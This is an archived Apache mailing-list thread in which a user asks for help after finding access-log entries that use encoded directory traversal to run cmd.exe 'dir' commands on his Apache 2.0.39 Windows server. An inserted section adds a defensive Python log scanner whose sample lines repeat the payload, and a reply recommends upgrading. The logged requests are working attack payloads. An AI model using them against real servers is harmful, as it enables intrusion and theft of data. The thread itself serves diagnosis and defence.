Posted to users@httpd.apache.org by Jere <je...@iki.fi> on 2002/11/07 16:31:55 UTC

[users@httpd] Security hole with Apache 2.0.39 & Win2K?

Greetings!

I'm sorry if this is something that has already been discussed, I just 
joined the list. I tried to check out on this matter, but didn't find any 
info elsewhere.

I found some suspicious stuff on my computer. First, there were files 
named dirc.txt...dirg.txt in the root of my C:\ drive. Plus, there was a 
copy of Windows' cmd.exe renamed as root.exe.
The txt files contained the root dir listings for the drives.

Then, I found this from my Apache log:

p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:49 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+c:>>c:\dirc.txt 
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:52 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+d:>>c:\dird.txt 
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:53 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+e:>>c:\dire.txt 
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:55 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+f:>>c:\dirf.txt 
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:56 +0300] "GET 
/cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+g:>>c:\dirg.txt 
HTTP/1.1" 500 934 "http://mitglied.lycos.de/asksig/apa_dir/engine.php" 
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:22:58 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 2237 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:01 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdird.txt HTTP/1.1" 200 0 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:03 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdire.txt HTTP/1.1" 200 0 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:05 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirf.txt HTTP/1.1" 200 0 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"
p50832D3B.dip.t-dialin.net - - [26/Oct/2002:18:23:07 +0300] "GET 
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirg.txt HTTP/1.1" 200 0 
"http://mitglied.lycos.de/asksig/apa_dir/engine.php" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1)"

Then I surfed to the address mentioned in the HTTP request, finding what is 
apparently some pages of a German-speaking hacker (cracker?). You can type 
in an IP address and you can see the directory listings for the root drives 
for that machine. Seems it works at least with Apache 2.0.39 and Win2K that 
I'm running. Or was; I took it offline when I found this out.

So the question is, what is all this? Have I forgotten some installation 
trick or what? I'm not that worried about the dir listing, but are there 
more harmful things that can be done this way?

No viruses on my computer, I'm running Symantec antivirus, database just 
updated. Also, ZoneAlarm should keep most of the unwanted guests away.

Thanks for any help,
Jere


-- 
Jere Knuuttila      They took one look at me and said, "Oh my god",
jere@iki.fi         get a haircut and get a real job!
+358 50 585 3949                         George Thorogood - Haircut
http://jere.iki.fi


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
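The requests in the log above all share one shape: the path segments are URL-encoded backslashes (%5c) and dot-dot pairs (%2e%2e) that walk out of the cgi-bin and /error directories. The following is an added example, not code from the original post or from the Apache project, showing how a defender would scan an access log for that pattern. It percent-decodes each request target, folds backslashes to forward slashes, and flags any path that still contains a ".." segment; it also marks a hit as "served" when the response was 2xx with a non-zero body, which is the difference between a probe that was refused and one that actually read a file back. The sample log lines are constructed in Apache's Combined Log Format to mirror the posted requests; the hosts and byte counts are made up.

```python
"""Flag URL-encoded directory-traversal requests in an Apache access log.

Added example; the log lines in SAMPLE_LOG are constructed, not the
original poster's log (hosts from the TEST-NET ranges, sizes made up).
"""
import re
from urllib.parse import unquote

# Constructed sample lines in Combined Log Format.
SAMPLE_LOG = r'''
203.0.113.7 - - [26/Oct/2002:18:22:49 +0300] "GET /cgi-bin/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd.exe?/c+dir+c:>>c:\dirc.txt HTTP/1.1" 500 934 "http://example.invalid/engine.php" "Mozilla/4.0"
203.0.113.7 - - [26/Oct/2002:18:22:58 +0300] "GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cdirc.txt HTTP/1.1" 200 2237 "http://example.invalid/engine.php" "Mozilla/4.0"
198.51.100.4 - - [26/Oct/2002:18:30:00 +0300] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
198.51.100.4 - - [26/Oct/2002:18:30:05 +0300] "GET /docs/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/4.0"
'''

# Combined Log Format: host ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def normalize_path(target: str) -> str:
    """Drop the query string, percent-decode until stable, fold '\\' to '/'.

    Decoding repeatedly (bounded) also unwraps double-encoded sequences
    such as %255c, which a single unquote() would leave as %5c.
    """
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(target: str) -> bool:
    """True when the normalized path contains a '..' segment."""
    return any(seg == ".." for seg in normalize_path(target).split("/"))


def scan_log(text: str) -> list:
    """Return one finding per traversal request in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_traversal(m["target"]):
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        findings.append({
            "host": m["host"],
            "time": m["time"],
            "path": normalize_path(m["target"]),
            "status": status,
            # A 2xx with a non-empty body on a traversal path means the
            # server handed back content from outside its document root.
            "served": 200 <= status < 300 and size > 0,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "SERVED" if f["served"] else "refused"
        print(f'{f["time"]} {f["host"]} {f["status"]} {flag} {f["path"]}')
```

One caveat the posted log illustrates: a 500 on the cmd.exe request is not evidence that nothing happened. The command's output went to a file, not the HTTP response, and the later request for /error/...dirc.txt came back 200 with 2237 bytes, so the listing had been written and was then read back. Treat any "served" hit, and any 500 on a traversal path to an executable, as a confirmed compromise to investigate rather than a blocked probe.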


Re: [users@httpd] Security hole with Apache 2.0.39 & Win2K?

Posted by Jacob Coby <jc...@listingbook.com>.
http://www.cgisecurity.com/archive/webservers/apache-pre-2.0.40-dir-transversal-bug.txt
You should upgrade Apache.

----- Original Message -----
From: "Jere" <je...@iki.fi>
To: <us...@httpd.apache.org>
Sent: Thursday, November 07, 2002 10:31 AM
Subject: [users@httpd] Security hole with Apache 2.0.39 & Win2K?


